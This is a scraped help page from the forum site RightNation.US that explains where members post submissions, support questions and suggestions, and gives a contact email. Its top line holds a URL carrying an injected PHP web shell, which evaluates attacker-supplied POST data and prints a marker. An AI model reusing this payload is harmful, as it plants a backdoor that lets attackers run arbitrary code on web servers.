============================================================================== ========================= END =================================== ========================= /forums/index.php?%3C?php;if(@$_GET[%22wt%22]){print(512314);@eval($_POST[%22p1%22]);print(512314);die;}?%3E =================================== ============================================================================== Help Topic - RightNation.US
RightNation.US
News (Home) | Righters' Blog | Hollywood Halfwits | Our Store | New User Intro | Link to us | Support Us

RightNation.US: Help Topic - RightNation.US

Help Topic: Contacting RightNation.US

Contact Information

Halfwit Submissions

It is of great service to me to have the RightNation.US community help me out by alerting me of more inane quotes to put on the site. Please do not email these submissions to me. We have sections of the Discussion Forum devoted specifically for this purpose:

Entertainment Halfwits

Tech Support

Please post your tech support questions in the Technical Support forum.

Suggestions

Post your suggestions in the Suggestions forum.

Hate Mail

Post your Hate Mail in this forum.

Everything Else

If you have already read all the Help Files AND you have already tried to ask your question in our Technical Support forum OR if there is anything else of importance that doesn't fit in the above categories, you may e-mail us directly at service@rightnation.us.